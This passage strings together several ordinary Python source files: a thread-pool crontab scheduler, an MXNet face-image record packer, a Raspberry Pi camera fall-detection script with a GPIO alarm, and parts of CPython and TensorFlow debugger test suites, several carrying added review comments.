        # check all types defined in Python/
        size = test.support.calcobjsize
        vsize = test.support.calcvobjsize
        check = self.check_sizeof
        # _ast.AST
        import _ast
        check(_ast.AST(), size('P'))
        try:
            raise TypeError
        except TypeError:
            tb = sys.exc_info()[2]
            # traceback
            if tb is not None:
                check(tb, size('2P2i'))
        # symtable entry
        # XXX
        # sys.flags
        check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
    """regrtest entry point: run both test classes in this module."""
    test.support.run_unittest(SysModuleTest, SizeofTest)

if __name__ == "__main__":
    test_main()
|
crontab.py | # -*- coding: utf-8 -*-
import time
import logging
import traceback
from threading import Lock, Thread, current_thread
LOG = logging.getLogger('crontab')
class Task(object):
    """A named callback that runs at most once per *interval* seconds.

    Workers coordinate through pick()/release(): only the worker that
    successfully picked a task may run it.
    """

    def __init__(self, name, interval, callback):
        self.name = name
        self.latest_run = 0          # wall-clock time of the last run; 0 = never
        self._interval = interval    # minimum seconds between two runs
        self._callback = callback
        self._picked = False         # True while a worker owns this task

    def run(self):
        """Record the run timestamp, then invoke the callback."""
        self.latest_run = time.time()
        self._callback()

    def pick(self):
        """Try to claim this task; return True on success.

        The claim fails when another worker already holds the task, or
        when the interval since the latest run has not yet elapsed.
        """
        if self._picked:
            return False
        due_at = self.latest_run + self._interval
        if due_at > time.time():
            return False
        self._picked = True
        return True

    def release(self):
        """Give the task back so it becomes pickable again."""
        self._picked = False
class Crontab(object):
    """crontab implement simple crontab dispatch"""
    def __init__(self, threads=1, accuracy=1):
        """create crontab with given working threads and accuracy

        :threads: thread pool size, default 1
        :accuracy: min time interval (seconds) used by crontab, default 1
        """
        self._accuracy = accuracy
        self._pick_lock = Lock()
        self._crontab_list = {}
        self._threads = []
        self._stoped = False
        self._start_worker(threads)

    def _start_worker(self, threads):
        # Spawn the worker pool; each worker polls for runnable tasks.
        for i in range(threads):
            name = 'crontab_worker_{}'.format(i)
            t = Thread(target=self._worker, name=name)
            t.start()
            LOG.info('start worker %s', name)
            self._threads.append(t)

    def stop(self):
        """ stop crontab and wait for all workers to exit """
        self._stoped = True
        for t in self._threads:
            t.join()

    def add_task(self, name, interval, callback):
        """register (or replace) a task to run every `interval` seconds"""
        LOG.info('add task %s, interval %ds', name, interval)
        # Take the pick lock: workers iterate _crontab_list in _pick(),
        # and mutating a dict during iteration raises RuntimeError.
        with self._pick_lock:
            self._crontab_list[name] = Task(name, interval, callback)

    def _worker(self):
        while True:
            if self._stoped:
                LOG.info('stoped %s quit!', current_thread().name)
                return
            task = self._pick()
            if task is not None:
                LOG.info('run task %s in %s', task.name, current_thread().name)
                try:
                    task.run()
                except Exception as e:
                    LOG.error('task raise exception %s', str(e))
                    traceback.print_exc()
                finally:
                    # Release in a finally so the task is never orphaned,
                    # even if the callback raises a non-Exception.
                    task.release()
                continue
            time.sleep(self._accuracy)

    def _pick(self):
        # The context manager guarantees the lock is released even if
        # task.pick() raises (the manual acquire/release did not).
        with self._pick_lock:
            for task in self._crontab_list.values():
                if task.pick():
                    return task
            return None
|
face2rec2.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
#curr_path = os.path.abspath(os.path.dirname(__file__))
#sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
#from builtins import range
from easydict import EasyDict as edict
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'common'))
import face_preprocess
import face_image
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_list(path_in):
    """Yield record items parsed from the .lst file at *path_in*.

    Emits one flag-0 item per aligned/landmarked image line, then one
    flag-2 header item with the identity index range, then one flag-2
    item per identity holding its [start, end) image-id span. Items are
    edict records consumed by image_encode().
    """
    with open(path_in) as fin:
        identities = []
        # last = [previous label, image id where that label started]
        last = [-1, -1]
        _id = 1
        while True:
            line = fin.readline()
            if not line:
                break
            item = edict()
            item.flag = 0
            item.image_path, label, item.bbox, item.landmark, item.aligned = face_preprocess.parse_lst_line(line)
            # Without alignment we need landmarks to align later; skip
            # lines that provide neither.
            if not item.aligned and item.landmark is None:
                #print('ignore line', line)
                continue
            item.id = _id
            item.label = [label, item.aligned]
            yield item
            # Input is assumed grouped by label: close the previous
            # identity's id range when the label changes.
            if label != last[0]:
                if last[1] >= 0:
                    identities.append((last[1], _id))
                last[0] = label
                last[1] = _id
            _id += 1
        # Close the final identity's range.
        identities.append((last[1], _id))
        # Header item: label holds the id range of the identity items below.
        item = edict()
        item.flag = 2
        item.id = 0
        item.label = [float(_id), float(_id + len(identities))]
        yield item
        # One flag-2 item per identity, carrying its image-id span.
        for identity in identities:
            item = edict()
            item.flag = 2
            item.id = _id
            _id += 1
            item.label = [float(identity[0]), float(identity[1])]
            yield item
def image_encode(args, i, item, q_out):
    """Encode one item into a packed record and put (i, record, [id]) on q_out.

    Flag-0 items carry an image: already-aligned images are packed as raw
    bytes, otherwise the image is aligned with the landmarks first.
    Flag-2 items are metadata-only records with an empty payload.
    """
    oitem = [item.id]
    #print('flag', item.flag)
    if item.flag == 0:
        fullpath = item.image_path
        header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
        #print('write', item.flag, item.id, item.label)
        if item.aligned:
            # Image is already aligned on disk; pack the raw file bytes.
            with open(fullpath, 'rb') as fin:
                img = fin.read()
            s = mx.recordio.pack(header, img)
            q_out.put((i, s, oitem))
        else:
            img = cv2.imread(fullpath, args.color)
            assert item.landmark is not None
            img = face_preprocess.preprocess(img, bbox = item.bbox, landmark=item.landmark, image_size='%d,%d'%(args.image_h, args.image_w))
            s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
            q_out.put((i, s, oitem))
    else:
        header = mx.recordio.IRHeader(item.flag, item.label, item.id, 0)
        #print('write', item.flag, item.id, item.label)
        # Use b'' not '': pack() prepends a struct-packed bytes header, and
        # concatenating a str payload raises TypeError on Python 3.
        s = mx.recordio.pack(header, b'')
        q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
    """Consume (index, item) pairs from q_in and encode each onto q_out.

    Runs until the ``None`` sentinel is received on q_in.
    """
    for task in iter(q_in.get, None):
        idx, record_item = task
        image_encode(args, idx, record_item, q_out)
def write_worker(q_out, fname, working_dir):
    """Drain encoded records from q_out and write <prefix>.rec / <prefix>.idx.

    Encoder processes may deliver records out of order, so arrivals are
    staged in a dict and flushed strictly in input-list order. Terminates
    after the ``None`` sentinel is received and all staged records with
    contiguous indices have been flushed.
    """
    base = os.path.splitext(os.path.basename(fname))[0]
    record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, base + '.idx'),
                                           os.path.join(working_dir, base + '.rec'), 'w')
    pending = {}   # staging area: input index -> (packed_record, [record_id])
    next_idx = 0   # next input-list index expected on disk
    pre_time = time.time()
    while True:
        message = q_out.get()
        final_drain = message is None
        if not final_drain:
            arrival_idx, packed, meta = message
            pending[arrival_idx] = (packed, meta)
        # Flush every contiguous run of indices now available.
        while next_idx in pending:
            packed, meta = pending.pop(next_idx)
            if packed is not None:
                record.write_idx(meta[0], packed)
            if next_idx % 1000 == 0:
                cur_time = time.time()
                print('time:', cur_time - pre_time, ' count:', next_idx)
                pre_time = cur_time
            next_idx += 1
        if final_drain:
            break
def parse_args():
    """Parse the command-line arguments for list/record creation.

    Returns:
        argparse.Namespace with ``prefix`` normalized to an absolute path.

    BUG FIX: the boolean options previously used ``type=bool``, under which
    any non-empty string -- including ``--list False`` -- parsed as True.
    They now use an explicit string-to-bool converter, so both
    ``--shuffle True`` and ``--shuffle False`` behave as expected.
    """
    def _str2bool(value):
        # argparse passes the raw CLI token; accept common boolean spellings.
        if isinstance(value, bool):
            return value
        if value.lower() in ('yes', 'true', 't', 'y', '1'):
            return True
        if value.lower() in ('no', 'false', 'f', 'n', '0'):
            return False
        raise argparse.ArgumentTypeError('Boolean value expected, got %r' % value)
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        description='Create an image list or \
        make a record database by reading from an image list')
    parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
    cgroup = parser.add_argument_group('Options for creating image lists')
    cgroup.add_argument('--list', type=_str2bool, default=False,
                        help='If this is set im2rec will create image list(s) by traversing root folder\
        and output to <prefix>.lst.\
        Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
    cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
                        help='list of acceptable image extensions.')
    cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
    cgroup.add_argument('--train-ratio', type=float, default=1.0,
                        help='Ratio of images to use for training.')
    cgroup.add_argument('--test-ratio', type=float, default=0,
                        help='Ratio of images to use for testing.')
    cgroup.add_argument('--recursive', type=_str2bool, default=False,
                        help='If true recursively walk through subdirs and assign an unique label\
        to images in each folder. Otherwise only include images in the root folder\
        and give them label 0.')
    cgroup.add_argument('--shuffle', type=_str2bool, default=True, help='If this is set as True, \
        im2rec will randomize the image order in <prefix>.lst')
    rgroup = parser.add_argument_group('Options for creating database')
    rgroup.add_argument('--quality', type=int, default=95,
                        help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
    rgroup.add_argument('--num-thread', type=int, default=1,
                        help='number of thread to use for encoding. order of images will be different\
        from the input list if >1. the input list will be modified to match the\
        resulting order.')
    rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
                        help='specify the color mode of the loaded image.\
        1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
        0: Loads image in grayscale mode.\
        -1:Loads image as such including alpha channel.')
    rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
                        help='specify the encoding of the images.')
    rgroup.add_argument('--pack-label', type=_str2bool, default=False,
                        help='Whether to also pack multi dimensional label in the record file')
    args = parser.parse_args()
    # Normalize so downstream .startswith(prefix) checks work from any cwd.
    args.prefix = os.path.abspath(args.prefix)
    return args
if __name__ == '__main__':
    # Entry point: read every <prefix>*.lst in the working directory and
    # convert each into a .rec/.idx recordio pair.
    args = parse_args()
    if args.list:
        # List creation is not implemented in this variant of the tool.
        pass
    else:
        # The working directory holds the .lst inputs and receives the
        # .rec/.idx outputs.
        if os.path.isdir(args.prefix):
            working_dir = args.prefix
        else:
            working_dir = os.path.dirname(args.prefix)
        # Target image size comes from the dataset's property file.
        prop = face_image.load_property(working_dir)
        image_size = prop.image_size
        print('image_size', image_size)
        args.image_h = image_size[0]
        args.image_w = image_size[1]
        files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
                 if os.path.isfile(os.path.join(working_dir, fname))]
        count = 0
        for fname in files:
            if fname.startswith(args.prefix) and fname.endswith('.lst'):
                print('Creating .rec file from', fname, 'in', working_dir)
                count += 1
                image_list = read_list(fname)
                # -- write_record -- #
                if args.num_thread > 1 and multiprocessing is not None:
                    # Multi-process path: N reader/encoder processes feed one
                    # writer; work is round-robined across the input queues.
                    q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
                    q_out = multiprocessing.Queue(1024)
                    read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
                                    for i in range(args.num_thread)]
                    for p in read_process:
                        p.start()
                    write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
                    write_process.start()
                    for i, item in enumerate(image_list):
                        q_in[i % len(q_in)].put((i, item))
                    # One None sentinel per reader; then, after the readers
                    # finish, one sentinel for the writer.
                    for q in q_in:
                        q.put(None)
                    for p in read_process:
                        p.join()
                    q_out.put(None)
                    write_process.join()
                else:
                    # Single-threaded fallback: encode and write in-line.
                    print('multiprocessing not available, fall back to single threaded encoding')
                    try:
                        import Queue as queue
                    except ImportError:
                        import queue
                    q_out = queue.Queue()
                    fname = os.path.basename(fname)
                    fname_rec = os.path.splitext(fname)[0] + '.rec'
                    fname_idx = os.path.splitext(fname)[0] + '.idx'
                    record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
                                                           os.path.join(working_dir, fname_rec), 'w')
                    cnt = 0
                    pre_time = time.time()
                    for i, item in enumerate(image_list):
                        image_encode(args, i, item, q_out)
                        if q_out.empty():
                            continue
                        _, s, item = q_out.get()
                        record.write_idx(item[0], s)
                        if cnt % 1000 == 0:
                            cur_time = time.time()
                            print('time:', cur_time - pre_time, ' count:', cnt)
                            pre_time = cur_time
                        cnt += 1
        if not count:
            # BUG FIX: message previously read "Did not find and list file".
            print('Did not find any list file with prefix %s'%args.prefix)
|
fall_det_3thread.py |
# Enable the on-screen HUD (FPS counter + detect status) drawn in the main loop.
debug = 1
from picamera.array import PiRGBArray
from threading import Thread
from picamera import PiCamera
import RPi.GPIO as GPIO
import Queue
import time
import cv2
# Reset any GPIO state left over from a previous run, then claim BCM pin 20
# as the alarm output line.
GPIO.cleanup()
GPIO.setmode(GPIO.BCM)
GPIO.setup(20, GPIO.OUT)
# Worker-to-main-loop handoff queues: contours produced by the frame-diff
# thread, and grayscale (optionally blurred) frames from the Gaussian thread.
readyContour = Queue.Queue()
ggframes = Queue.Queue()
def convertFrame(frame, width=750):
    """Resize a frame to the given width, preserving its aspect ratio.

    Args:
        frame: BGR image array (e.g. from PiRGBArray).
        width: target width in pixels; defaults to the original hard-coded
            750 so existing callers are unchanged.

    Returns:
        The resized frame.
    """
    scale = float(width) / frame.shape[1]
    dim = (width, int(frame.shape[0] * scale))
    return cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)
def applyGaussian(frame, ggframes):
    """Grayscale (and optionally Gaussian-blur) a frame, then publish it on
    the ggframes queue for the main loop.

    Reads the module-level useGaussian / gaussianPixels settings.
    """
    result = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    if useGaussian:
        kernel = (gaussianPixels, gaussianPixels)
        result = cv2.GaussianBlur(result, kernel, 0)
    ggframes.put(result)
def calculateFrameDiff(firstFrame,gray,readyContour):
    """Diff the current gray frame against the reference frame and queue the
    motion contours found in the thresholded, dilated difference image.

    Reads the module-level thresholdLimit / dilationPixels settings.
    """
    frameDelta = cv2.absdiff(firstFrame, gray)
    thresh = cv2.threshold(frameDelta, thresholdLimit, 255, cv2.THRESH_BINARY)[1]
    thresh = cv2.dilate(thresh, None, iterations=dilationPixels) # dilate thresh
    # NOTE(review): the 3-value return is the OpenCV 3.x findContours API;
    # OpenCV 2.x and 4.x return 2 values -- confirm the installed version.
    _, contours, _ = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #find contours
    readyContour.put(contours)
# Video or camera
camera = PiCamera()
camera.vflip = True
camera.resolution = (1024, 864)
camera.framerate = 32
rawCapture = PiRGBArray(camera, size=(1024, 864))
time.sleep(1.0)  # give the camera sensor time to warm up
firstFrame = None  # reference frame for motion diffing; set on first loop pass
start = time.time()  # FPS measurement anchor
i = 0  # per-frame contour counter
# Per-contour bookkeeping (up to 100 tracked boxes per frame).
lastH = [0]*100
lastW = [0]*100
boxPosition = [0]*100
# Detect parameters
widthRatio = 1.40     # a box wider than height*ratio is treated as a fall
minArea = 40*40       # ignore contours smaller than this (pixels^2)
thresholdLimit = 20   # binary threshold applied to the frame delta
dilationPixels = 20 # 10
useGaussian = 1       # blur before diffing to suppress sensor noise
gaussianPixels = 31   # Gaussian kernel size (must be odd)
contours=[]
upDateFrame=0
firstTime=True
fallState = ""
redBox = (0,0,255)    # BGR: alarm box color
greenBox = (124,252,0)  # BGR: normal box color
boxColor=redBox
# loop for each frame in video
# Main detection loop: grab a frame, hand gray-conversion and frame-diffing
# to worker threads via queues, then classify each motion contour as a fall
# (wider than tall) or normal movement, driving GPIO pin 20 as the alarm.
# NOTE(review): a brand-new Thread is created each frame and isAlive() on a
# never-started thread is always False, so start() runs every frame -- the
# queues are what actually decouple the pipeline stages.
for frame in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True):
    detectStatus = "Empty"
    frame = frame.array
    frame = convertFrame(frame)
    # First pass: produce the gray frame synchronously so `gray` is defined
    # before any worker output arrives.
    if firstTime==True:
        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        if useGaussian:
            gray = cv2.GaussianBlur(gray, (gaussianPixels, gaussianPixels), 0)
        firstTime=False
    gthread = Thread(target = applyGaussian,args = (frame,ggframes))
    if gthread.isAlive()==False:
        gthread.start()
    # Use the freshest gray frame a worker has produced, if any.
    if ggframes.empty()==False:
        gray=ggframes.get_nowait()
    if firstFrame is None:
        rawCapture.truncate(0)
        time.sleep(1.0) # let camera autofocus + autosaturation settle
        firstFrame = gray
        continue
    thread = Thread(target = calculateFrameDiff, args = (firstFrame,gray,readyContour))
    if thread.isAlive()==False:
        thread.start()
    if readyContour.empty()==False:
        contours=readyContour.get_nowait()
    # No motion: make sure the alarm output is off.
    if not contours:
        GPIO.output(20,False)
    for contour in contours:
        if cv2.contourArea(contour) < minArea:
            continue
        #Drawing rect over contour
        (x, y, w, h) = cv2.boundingRect(contour)
        cv2.rectangle(frame, (x, y), (x + w, y + h), boxColor, 2)
        boxPosition[i] = x+y
        # Fall heuristic: bounding box noticeably wider than tall.
        if w > h*widthRatio:
            GPIO.output(20,True)
            fallState = "Alarm!"
            boxColor=redBox
            print "Alarm: " + format(time.time())
        else:
            fallState = ""
            boxColor = greenBox
        lastW[i] = w
        lastH[i] = h
        #cv2.putText(frame,"{}".format(cv2.contourArea(contour)), (x, y+h+20), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 1)
        cv2.putText(frame, "{}".format(i), (x, y+22), cv2.FONT_HERSHEY_SIMPLEX, 0.8, boxColor, 1)
        cv2.putText(frame, "{}".format(fallState), (x+22, y+22), cv2.FONT_HERSHEY_SIMPLEX, 0.8, boxColor, 1)
        detectStatus = "Ok"
        i+=1
    #Hud + fps
    if debug:
        end = time.time()
        seconds = end - start
        fps = round((1 / seconds), 1)
        start = time.time()
        cv2.putText(frame, "Detect: {}".format(detectStatus), (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 140, 255), 1)
        cv2.putText(frame, "FPS: {}".format(fps), (400, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 140, 255), 1)
        #cv2.imshow("frameDelta", frameDelta)
        #cv2.imshow("Thresh", thresh)
        #cv2.imshow("firstFrame", firstFrame)
        cv2.imshow("Feed", frame)
    i = 0
    rawCapture.truncate(0)
    # NOTE(review): '=+1' assigns +1 every pass rather than incrementing;
    # '+=' was probably intended -- confirm before changing, the counter is
    # not read anywhere in this view.
    upDateFrame=+1
    key = cv2.waitKey(1) & 0xFF
    if key == ord("q"):
        break
    # 'n' re-arms the detector by capturing a new reference frame.
    if key == ord("n"):
        firstFrame = None
# Release and destroy
GPIO.cleanup()
# BUG FIX: PiCamera has no release() method (release() is the
# cv2.VideoCapture API); close() is how a PiCamera frees the sensor.
camera.close()
cv2.destroyAllWindows()
|
session_debug_testlib.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import glob
import os
import shutil
import tempfile
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_graphs
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
def no_rewrite_session_config():
  """Return a ConfigProto with Grappler graph rewrites disabled.

  Model pruning, arithmetic optimization and dependency optimization are
  all switched off so the graph the debugger observes matches the graph
  exactly as built.
  """
  off = rewriter_config_pb2.RewriterConfig.OFF
  rewrites = rewriter_config_pb2.RewriterConfig(
      disable_model_pruning=True,
      arithmetic_optimization=off,
      dependency_optimization=off)
  return config_pb2.ConfigProto(
      graph_options=config_pb2.GraphOptions(rewrite_options=rewrites))
class _RNNCellForTest(rnn_cell_impl.RNNCell):
  """RNN cell for testing: output = w * input, state passed through."""
  def __init__(self, input_output_size, state_size):
    # Output size equals input size; state is a pass-through of fixed size.
    self._input_output_size = input_output_size
    self._state_size = state_size
    # Single trainable scalar so optimizer-based tests have a variable.
    self._w = variables.Variable(1.0, dtype=dtypes.float32, name="w")
  @property
  def output_size(self):
    """Size of the cell's output (same as its input)."""
    return self._input_output_size
  @property
  def state_size(self):
    """Size of the cell's (unchanged) state."""
    return self._state_size
  def __call__(self, input_, state, scope=None):
    # Scale the input by w; return the state unmodified.
    return (math_ops.multiply(self._w, input_), state)
class SessionDebugTestBase(test_util.TensorFlowTestCase):
"""Base class for unit tests of tfdbg running with tf.Session."""
@classmethod
def setUpClass(cls):
if test.is_gpu_available():
cls._expected_partition_graph_count = 2
cls._expected_num_devices = 2
gpu_name = test_util.gpu_device_name()
cls._main_device = "/job:localhost/replica:0/task:0" + gpu_name
else:
cls._expected_partition_graph_count = 1
cls._expected_num_devices = 1
cls._main_device = "/job:localhost/replica:0/task:0/device:CPU:0"
  @classmethod
  def tearDownClass(cls):
    # No class-level resources to release; present for symmetry with
    # setUpClass and as an override point for subclasses.
    pass
  def setUp(self):
    # Fresh temporary dump directory for every test case.
    self._dump_root = tempfile.mkdtemp()
  def tearDown(self):
    """Reset the default graph and remove this test's dump directory."""
    ops.reset_default_graph()
    # Tear down temporary dump directory.
    if os.path.isdir(self._dump_root):
      shutil.rmtree(self._dump_root)
  def _debug_urls(self, run_number=None):
    """Return the debug URL(s) (e.g. file:// or grpc://) for dumping;
    concrete subclasses must override."""
    raise NotImplementedError(
        "_debug_urls() method is not implemented in the base test class.")
  def _debug_dump_dir(self, run_number=None):
    """Return the on-disk dump directory for a run; concrete subclasses
    must override."""
    raise NotImplementedError(
        "_debug_dump_dir() method is not implemented in the base test class.")
  def _debug_run_and_get_dump(self,
                              sess,
                              fetches,
                              feed_dict=None,
                              debug_ops="DebugIdentity",
                              tolerate_debug_op_creation_failures=False,
                              global_step=-1,
                              validate=True,
                              expected_partition_graph_count=None):
    """Run fetches with debugging and obtain DebugDumpDir.

    Args:
      sess: the tf.Session to be used.
      fetches: fetches of the Session.run().
      feed_dict: feed dict for the Session.run().
      debug_ops: name(s) of the debug ops to be used.
      tolerate_debug_op_creation_failures: whether to tolerate debug op
        creation failures.
      global_step: Optional global step.
      validate: whether to validate dumped tensors against graph.
      expected_partition_graph_count: optional count of partition graphs to
        assert on.

    Returns:
      1. Return values of the Session.run().
      2. The DebugDumpDir object from the debugged run().
    """
    # Watch every node in the graph with the requested debug ops, dumping to
    # this test class's URLs (file:// or grpc://, per subclass).
    run_options = config_pb2.RunOptions(output_partition_graphs=True)
    debug_utils.watch_graph(
        run_options,
        sess.graph,
        debug_ops=debug_ops,
        debug_urls=self._debug_urls(),
        tolerate_debug_op_creation_failures=tolerate_debug_op_creation_failures,
        global_step=global_step)
    run_metadata = config_pb2.RunMetadata()
    run_output = sess.run(fetches,
                          feed_dict=feed_dict,
                          options=run_options,
                          run_metadata=run_metadata)
    if expected_partition_graph_count is not None:
      self.assertEqual(expected_partition_graph_count,
                       len(run_metadata.partition_graphs))
    # Load the dump directory produced by the debugged run for inspection.
    return run_output, debug_data.DebugDumpDir(
        self._dump_root, partition_graphs=run_metadata.partition_graphs,
        validate=validate)
  def _generate_dump_from_simple_addition_graph(self):
    """Run w = matmul(u, v) with file:// watches; return all the artifacts
    (initial values, tensors, node names and the loaded dump) as a
    namedtuple for the assertions in the tests that share this graph."""
    with session.Session(config=no_rewrite_session_config()) as sess:
      u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
      v_init_val = np.array([[2.0], [-1.0]])
      # Use node names with overlapping namespace (i.e., parent directory) to
      # test concurrent, non-racing directory creation.
      u_name = "u"
      v_name = "v"
      w_name = "w"
      u_init = constant_op.constant(u_init_val, shape=[2, 2])
      u = variables.Variable(u_init, name=u_name)
      v_init = constant_op.constant(v_init_val, shape=[2, 1])
      v = variables.Variable(v_init, name=v_name)
      w = math_ops.matmul(u, v, name=w_name)
      u.initializer.run()
      v.initializer.run()
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = "file://%s" % self._dump_root
      # Add debug tensor watch for u.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % u_name, 0, debug_urls=debug_urls)
      # Add debug tensor watch for v.
      debug_utils.add_debug_tensor_watch(
          run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      # Invoke Session.run().
      sess.run(w, options=run_options, run_metadata=run_metadata)
      self.assertEqual(self._expected_partition_graph_count,
                       len(run_metadata.partition_graphs))
      dump = debug_data.DebugDumpDir(
          self._dump_root, partition_graphs=run_metadata.partition_graphs)
      # Bundle everything callers may assert on into one named tuple.
      simple_add_results = collections.namedtuple("SimpleAddResults", [
          "u_init_val", "v_init_val", "u", "v", "w", "u_name", "v_name", "w_name",
          "dump"
      ])
      return simple_add_results(u_init_val, v_init_val, u, v, w, u_name, v_name,
                                w_name, dump)
  def testCopyNodesHaveCorrectDebugOpsAndURLsAttributeValues(self):
    """The auto-inserted __copy_* nodes carry per-watch debug-op specs."""
    with session.Session() as sess:
      u = variables.Variable(2.1, name="u")
      v = variables.Variable(20.0, name="v")
      w = math_ops.multiply(u, v, name="w")
      sess.run(variables.global_variables_initializer())
      run_options = config_pb2.RunOptions(output_partition_graphs=True)
      debug_urls = self._debug_urls()
      debug_utils.add_debug_tensor_watch(
          run_options,
          "u",
          0, ["DebugNumericSummary(gated_grpc=True)", "DebugIdentity"],
          debug_urls=debug_urls)
      debug_utils.add_debug_tensor_watch(
          run_options, "v", 0, ["DebugNumericSummary"], debug_urls=debug_urls)
      run_metadata = config_pb2.RunMetadata()
      r = sess.run(w, options=run_options, run_metadata=run_metadata)
      self.assertAllClose(42.0, r)
      u_copy_node_def = None
      v_copy_node_def = None
      # Locate the Copy nodes tfdbg inserted for u and v in the partition
      # graphs.
      for partition_graph in run_metadata.partition_graphs:
        for node_def in partition_graph.node:
          if debug_graphs.is_copy_node(node_def.name):
            if node_def.name == "__copy_u_0":
              u_copy_node_def = node_def
            elif node_def.name == "__copy_v_0":
              v_copy_node_def = node_def
      self.assertIsNotNone(u_copy_node_def)
      debug_ops_spec = u_copy_node_def.attr["debug_ops_spec"].list.s
      self.assertEqual(2, len(debug_ops_spec))
      # Spec format: "<debug_op>;<debug_url>;<gated_grpc flag 0|1>".
      self.assertEqual("DebugNumericSummary;%s;1" % debug_urls[0],
                       debug_ops_spec[0].decode("utf-8"))
      self.assertEqual("DebugIdentity;%s;0" % debug_urls[0],
                       debug_ops_spec[1].decode("utf-8"))
      self.assertIsNotNone(v_copy_node_def)
      debug_ops_spec = v_copy_node_def.attr["debug_ops_spec"].list.s
      self.assertEqual(1, len(debug_ops_spec))
      self.assertEqual("DebugNumericSummary;%s;0" % debug_urls[0],
                       debug_ops_spec[0].decode("utf-8"))
  def testConcurrentDumpingToPathsWithOverlappingParentDirsWorks(self):
    """Core metadata and dumped tensor contents are correct for the shared
    simple-addition graph (whose node paths share a parent directory)."""
    results = self._generate_dump_from_simple_addition_graph()
    self.assertTrue(results.dump.loaded_partition_graphs())
    # Since global_step is not explicitly specified, it should take its default
    # value: -1.
    self.assertEqual(-1, results.dump.core_metadata.global_step)
    self.assertGreaterEqual(results.dump.core_metadata.session_run_index, 0)
    self.assertGreaterEqual(results.dump.core_metadata.executor_step_index, 0)
    self.assertEqual([], results.dump.core_metadata.input_names)
    self.assertEqual([results.w.name], results.dump.core_metadata.output_names)
    self.assertEqual([], results.dump.core_metadata.target_nodes)
    # Verify the dumped tensor values for u and v.
    self.assertEqual(2, results.dump.size)
    self.assertAllClose([results.u_init_val],
                        results.dump.get_tensors("%s/read" % results.u_name, 0,
                                                 "DebugIdentity"))
    self.assertAllClose([results.v_init_val],
                        results.dump.get_tensors("%s/read" % results.v_name, 0,
                                                 "DebugIdentity"))
    # Relative timestamps are measured from the dump's t0, hence >= 0.
    self.assertGreaterEqual(
        results.dump.get_rel_timestamps("%s/read" % results.u_name, 0,
                                        "DebugIdentity")[0], 0)
    self.assertGreaterEqual(
